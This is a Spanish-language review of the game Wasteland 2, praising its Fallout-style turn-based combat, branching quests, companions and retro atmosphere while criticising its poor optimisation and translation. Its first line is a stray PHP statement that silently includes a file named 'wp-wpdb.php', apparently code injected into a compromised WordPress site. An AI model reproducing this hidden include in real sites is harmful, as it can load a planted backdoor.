if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Wasteland 2 – La Fortaleza de LeChuck

Análisis Wasteland 2

Una de las cosas que siempre agradeceré al crowdfunding es que ha traído de vuelta viejas glorias de la mano de sus propios creadores, sin presiones de grandes compañías. Hace un par de años, cuando Kickstarter estaba en su máximo apogeo, Brian Fargo decidió que era el momento perfecto para desarrollar Wasteland 2, la segunda parte del clásico que sentó las bases de lo que sería después Fallout. Con Wasteland 2 vuelve un trocito de aquella época dorada de juegos de rol para PC. ¡Bienvenidos al yermo, nuevos reclutas!

wasteland2

Después del popular Kickstarter de Double Fine allá por marzo de 2012, Brian Fargo lanzó su campaña un mes después con la intención de recaudar 400.000 dólares para la secuela del clásico Wasteland. No hace falta decir que el éxito fue rotundo. Wasteland 2 consiguió casi 3 millones de dólares y muchas esperanzas puestas en Brian Fargo y en la resurrección del género de los RPG por turnos para PC. Después de unos meses de beta donde los backers pudieron testear el juego, Wasteland 2 aterrizó, para alegría de los que llevábamos años deseando un juego así.

Wasteland 2 guarda poca relación con del original de 1988 más allá de la ambientación y algunos conceptos. La jugabilidad y mecánica es puramente Fallout 1 y 2, una saga que comenzó por la imposibilidad de Fargo de continuar utilizando el nombre Wasteland, posesión de EA por entonces. Tras los primeros videos, vi claramente un reflejo de aquellos juegos del pasado, y desde entonces supe que lo iba a disfrutar. Mi toma de contacto con el juego fue algo accidentada, con frecuentes cierres inesperados a consecuencia de su nefasta optimización. Esta imposibilidad de jugar como dios manda me tenía en vela, pasando largas horas leyendo y probando consejos de foros hasta que finalmente un portátil de préstamo me llevó a convertirme en un ranger del desierto. De haber sido otro juego lo hubiera mandado a freír espárragos, pero este título despierta en tu interior un deseo irrefrenable de seguir jugando.

El camino del Ranger

Wasteland 2 comienza con un ligero prólogo cinematográfico que nos pone en antecedentes, en él podemos ver una guerra biológica que devastó La Tierra. Ya han pasado bastantes años desde entonces y la gente ha prosperado. Sin embargo, los bandidos siguen campando a sus anchas. Para combatir el crimen, nacieron Los Rangers del Desierto, una unidad de soldados experimentados que cuidan de la gente de bien. Nosotros seremos los próximos aspirantes a reclutas que tendrán que demostrar su valía para poder ingresar en el cuerpo.

Después de esta breve introducción, encontramos el creador de personajes. Los que hayan jugado a Fallout les resultará familiar, aunque sin Vault Boy. Podremos crear físicamente a nuestro ranger prefecto eligiendo entre los numerosos rostros, peinados, color de piel y vestimenta de pies a cabeza. También estará disponible la opción de edad, religión, marca de tabaco, y biografía, para darle ese toque más personalizado estilo ficha de personaje de juego de rol de mesa. En cuanto a nuestros atributos y stats en general, disponemos de un extenso listado de habilidades que nos ayudarán a sobrevivir ahí fuera. En este punto hay que pensar detenidamente que escogemos, ya que habilidades como forzar cerraduras, cirujano o informática nos sacarán de más de un apuro, así que a los no experimentados con los juegos de Brian Fargo, o con poca paciencia, mejor echar mano de los personajes prediseñados para facilitar la tarea.

wasteland2-1

Ya tenemos a nuestros 4 tipos duros para vivir aventuras, y desde La Ciudadela, sede de los Ranger, nos mandan la primera tarea como aspirantes a recluta: ir a la antena de radio donde el Ranger Ace desapareció mientras investigaba unas extrañas señales. A partir de aquí recorremos el yermo, conociendo nuevas ciudades, bases secretas, y ayudando a los habitantes que intentan sobrevivir a pesar de los malhechores que intentan adueñarse de la región. Todo ello bajo la permanente amenaza de la radiación que sigue castigando la zona.

Muchas misiones, diferentes resultados

Como ya nos tiene acostumbrados Brian Fargo, cada misión tendrá varias opciones de resolución. Podremos decantarnos por la vía pacífica o la violenta, por el bien o por el mal, cada opción tendrá consecuencias y pueden afectar en el devenir de los hechos. Por ejemplo: tenemos delante a un grupo de bandidos con ganas de pelea, podemos echar mano de la violencia y meterles un tiro entre ceja y ceja, o utilizar nuestras dotes comunicativas y persuadirles para que se alejen o incluso que se alisten en los rangers. Dependiendo del tipo de misión, la toma de decisiones requerirá de una profunda reflexión. En varias ocasiones he tenido que volver atrás ya que la opción escogida era bastante perjudicial y se alejaba del camino del bien. En otra ocasión, he recuperado la partida guardada para ver las consecuencias de las otras, por simple curiosidad. La misma curiosidad que te hace plantearte un segundo gameplay, ya que la cantidad de decisiones es abrumadora.

A lo largo de nuestro camino, encontraremos individuos que desean formar parte de nuestro grupo, animados por nuestra buena reputación. Hasta 3 personajes extras jugables podrán acompañar a nuestros rangers, los otros voluntarios tendrán que descansar en la base hasta que requiramos de sus servicios. Estos nuevos aliados reaccionan dependiendo de la situación, si la pifiamos disparando nos llamarán patoso, si alguno es bondadoso y matamos a un civil inocente se enfadará y puede que se revele, lo mismo si somos demasiado generosos y tenemos a un personaje malvado en el grupo. Este tipo de reacciones vuelve la experiencia muy divertida, disfrutando de la opinión de los tres ante las situaciones que se presentan, algo muy parecido a lo que pasaba en (el maravilloso) Baldur’s Gate.

wasteland2-8

Las misiones se dividen por el grado de importancia, resaltando las prioritarias de los rangers. Sin embargo, las que aumentarán enormemente nuestro listado serán las secundarias, que encontraremos de visita por los diferentes campamentos improvisados. Algunas de estas misiones tienen una importancia mayor y repercutirán en el final del juego. Otras, no cambiarán los hechos futuros, pero son historias muy humanas en las que se muestra el sufrimiento de la gente que lucha por seguir adelante. Vale la pena hacer todas y cada una de ellas, si no os perderéis una parte muy importante del juego.

Wasteland 2 se halla dividido en dos grandes mapas con infinitas localizaciones. Algunas se nos marcarán en el mapa cada vez que se nos confíe una misión, otras las descubriremos explorando la zona. Todas estas localizaciones son áreas muy extensas que se irán desbloqueando a medida que nos movamos. Explorar el mapa, los lugares señalados en él y realizar todas las misiones, son muchas horas de juego, pero valen la pena.

Wasteland 2 tiene muchos elementos de aventura clásica. Estamos hablando de un juego con miles de líneas de texto y opciones de diálogo, y más que se desbloquean si disponemos de un buen nivel de conversación. Vamos a pasar mucho tiempo leyendo y empapándonos de las historias locales y mitología. El juego ha sido traducido al castellano pero la localización no es del todo satisfactoria. A menudo encontramos textos con frases sin traducir y palabras simples mal escritas, síntoma de un traducción precipitada y veloz. Los parches han subsanado algunas, pero aún así es fácil ver errores. Esto sin duda estropea un poco la experiencia.

Personajes raros, botones rojos

El humor de Wasteland 2 está representado mediante personajes y situaciones disparatadas. En cada pueblo existe el loco de turno que nos contará su particular historia y a menudo nos ofrecerá misiones descabelladas y estúpidas, con diferentes alternativas y recompensas absurdas. Recuerdo al señor que querían expulsarle del pueblo porque era poco pulcro y me pedía que le buscara un champú anticaspa. Pero vamos a ver, ¿es que nos toman por los recaderos del desierto? Pues parece que sí. Otra de las cosas divertidas serán aquellos individuos/seres que nos perseguirán sin razón aparente, los objetos con descripciones absurdas y los elementos que nos plantean dilemas varios: ¿Apretar o no apretar el botón rojo? Estuve 15 minutos pensando, y me reí al recordar aquellas películas con situaciones parecidas.

wasteland2-6
Pe-pero… ¿tú de dónde has salido?

También quería comentar el hecho de que Wasteland 2 es un juego que ofrece una verdadera igualdad de género, es decir, a los personajes femeninos se les trata como tal. Se utilizan palabras femeninas como ella, guerrera, la ranger, etc. Además, vemos una larga lista de personajes femeninos de gran importancia manejando el cotarro: crueles y sanguinarias, y fuertes y honradas. También encontramos prostíbulos mixtos, y personajes de ambos sexos paseándose ligeritos de ropa por las calles. Por otro lado, en los consejos durante los tiempos de carga, se utilizan términos para ambos géneros, es usual leer «vosotros y vosotras» o lenguaje neutro para englobar a toda la comunidad de jugadoras y jugadores. Teniendo en cuenta que nuestros rangers pueden ser hombres y mujeres, y las que están detrás de la pantalla también, me ha parecido una iniciativa estupenda.

Apartado técnico añejo

No estamos ante un juego con una innovación gráfica «espatarrante», y supongo que Brian Fargo no tenía la intención de que así fuera. Wasteland 2 conserva la vista isométrica y gráficos de aspecto «fallouteros». El zoom ayuda tener una mejor visión de los detalles en los escenarios y así facilita la localización de objetos. Además, la interfaz sencilla permite dar con todo aquello que necesitamos sin esfuerzo y sin entorpecer el desarrollo de los hechos. La atmósfera post nuclear está muy conseguida, con lugares llenos de detalles que hacen imaginarte la terrible guerra que tuvo lugar bajo los escombros. Wasteland 2 es ese tipo de juego que a pesar de los gráficos simples y tener bugs incómodos, su enorme jugabilidad te impulsa a seguir avanzando. Todo esta hecho con cariño y se nota hasta en el más mínimo detalle.

wasteland2-3
Instalaciones secretas, guiños clásicos

Lamentablemente el juego está fatalmente optimizado, sufriendo cuelgues que las actualizaciones posteriores han ido subsanando, también han acabado con una gran cantidad de bugs y errores de traducción, pero aún así no es suficiente. Hoy se ha lanzado la mayor actualización hasta la fecha, así que espero que los nuevos rangers no tengan que enfrentarse a estas situaciones.

La música también tiene un papel importante ambientando el mundo desolado. Los sonidos y ligeras melodías son como ecos de la terrible guerra que destrozó el país. Otras son esperanzadoras y surgen cuando nos cruzados con supervivientes que han rehecho su vida entre chabolas y restos de edificios atravesados por la vegetación salvaje.

RPG por turnos

No os voy a engañar, Wasteland 2 no es un juego para todo el mundo. Sé de gente que es muy fan de Fallout 3 y Fallout New Vegas pero que no tocaría los Fallout clásicos ni con un palo. Estamos hablando de juego de rol táctico por turnos estilo tablero, los combates son más largos y se han de meditar los movimientos. Cada personaje tiene puntos de acción, y cada movimiento consume un buen número de ellos. Dependiendo del personaje y la experiencia, la cantidad varía. Además, al comienzo las batallas se hacen un poco desesperantes ya que nuestros rangers tienden a fallar disparos o se les atascan las armas (son novatos ¡comprendedlo!) y los menos pacientes querrán tirarse por la ventana. En cambio, una buena estrategia provoca tensión y emoción a partes iguales, y mucha satisfacción al lograr derrotar un grupo de enemigos duros de roer.

wasteland2-4
Hay que reflexionar antes de iniciar el ataque para no desperdiciar nuestros puntos de acción

Al subir de nivel recibimos nuevos puntos de experiencia para repartir como deseemos, pero más vale pararse unos minutos a pensar donde son necesarios para no sufrir más adelante. El juego tiene muchas puertas cerradas a cal y canto, cajas fuertes, trampas, alarmas, o peor aún… ¡ROBOTS! ¿Quizá haya algo que puedas hacer con ello? Piénsatelo bien.

Como buen RPG por turnos, no nos libraremos de los combates aleatorios. Cada vez que viajemos por el mapa, nos toparemos con enemigos fortuitos, e instantáneamente apareceremos en un escenario de batalla. No obstante, podremos evitar los molestos enfrentamientos aleatorios sumando puntos de vida al aire libre.

Dificultad

¡Aaaah! (grito nostálgico) ¿Recordáis esos juegos de PC donde había que guardar a cada segundo? Pues aquí reviviremos esa sensación de peligro e incertidumbre. Así que más os vale guardar mucho si no queréis lamentarlo después, ya que ni el autosave o el guardado opcional cada 15 minutos serán suficientes. Wasteland 2 es un juego que hereda la dificultad de los juegos de antaño, por lo tanto, el nivel de dificultad normal no corresponde al que estamos acostumbrados hoy en día. Al comienzo todo se hace un poco cuesta arriba, con armas pobres, poca coordinación de los personajes y enemigos con más nivel y mejor puntería. A medida que avanza el juego y nos curtimos por los caminos llenos de peligros, los combates nos resultarán más accesibles, y si no, en cualquier momento se puede rebajar la dificultad, aunque ya os adelanto que tampoco así resultará mucho más sencillo.

Por otro lado, los escenarios son inmensos, y para encontrar determinados objetos habrá que explorar de arriba a abajo y girar continuamente el ángulo de la cámara para no dejarnos nada sin mirar. Para los que prefieren ir al grano, se tirarán de los pelos, en cambio, para nosotros, los exploradores natos, lo vamos a disfrutar.

RECUERDA: ¡SALVA LA PARTIDA!

Un verdadero homenaje a la cultura pop de los 80 y 90.

Wasteland 2 cuenta con un gran número de referencias a películas, novelas, libros y juguetes de la década de los 80 y 90 esparcidos por todos los rincones del yermo. Algunos serán presentados en forma de objeto, otros formarán parte de la decoración del escenario y/o aparecerán en forma de guiños en los divertidos diálogos con los personajes. Es muy especial descubrir y recopilar las miles de joyas con las que hemos crecido aquellos afortunados que nacimos en los 80. Referencias a películas como Blade Runner, videojuegos tan variados como el desdichado ET. o juguetes como los famosos Trolls han sobrevivido a la guerra nuclear.

wasteland2-5
Una gloriosa videoconsola

Wasteland 2 es la agradable vuelta de un género clásico prácticamente abandonado para alegría de intrépidos exploradores que disfrutaban recorriendo de punta a punta los mapas que se desbloqueaban bajo sus pies. Jugar a Wasteland 2 me ha transportado a los maravillosos 90, donde los juegos de PC exclusivos, variados y con un gran potencial surgían a borbotones. Una época donde Interplay y Black Isle existían.

Llevaba mucho tiempo esperando un juego así.